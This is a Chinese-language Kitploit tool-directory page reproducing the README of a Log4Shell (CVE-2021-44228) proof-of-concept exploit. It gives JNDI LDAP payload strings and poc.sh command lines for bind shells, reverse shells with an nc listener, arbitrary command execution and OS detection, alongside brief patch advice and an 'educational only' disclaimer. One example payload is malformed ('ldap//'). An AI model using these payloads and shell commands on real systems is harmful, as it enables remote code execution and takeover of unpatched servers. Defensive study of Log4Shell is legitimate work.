Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228(Log4Shell)的概念验证漏洞利用,包含HTTP和LDAP服务器,支持反向/绑定Shell、RCE以及基于时间的检测,仅供教育用途。 | Kitploit
工具/GitHubGitHub/thearqsz/cve-2021-44228-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228(Log4Shell)的概念验证漏洞利用,包含HTTP和LDAP服务器,支持反向/绑定Shell、RCE以及基于时间的检测,仅供教育用途。

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44228 PoC

CVE-2021-44228 的 PoC。

该项目仅用于教育目的。

漏洞利用服务器

该项目创建了两个服务器:http 和 ldap。两者都是利用工作所必需的。指定的 Java 文件被编译,服务器在 Dockerfile 中启动。有效载荷会展示给用户——它必须被传递给易受攻击的应用程序。

示例有效载荷:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

如何运行?

  • 绑定 shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • 反向 shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • 基于时间的漏洞检测

它会使程序休眠 25 秒

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • 操作系统检测
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

操作系统检测可能会返回 4 个字母:

  • L 表示 Linux
  • W 表示 Windows
  • M 表示 MacOS
  • U 表示未知

绕过

绕过技术已发布。示例见此处

易受攻击的应用程序

该应用旨在演示其工作原理。要构建并运行包含该应用的 jar,请使用:

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

其中 PAYLOAD 是从 ./poc.sh 脚本返回的值(例如 ${jndi:ldap://127.0.0.1:1389/1})。

致谢

在创建此利用过程中使用的项目和网站的一些致谢:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

如何保护自己?

使用 log4j 启动应用时,请将 log4j2.formatMsgNoLookups 设置为 true,或更新到 log4j-2.15.0-rc1 或更高版本。更新已在野外发布——请尽快实施。

免责声明

本项目仅可用于教育目的。未经事先许可使用本软件攻击目标系统是非法的,因滥用本软件造成的任何损害,作者概不负责。

下载工具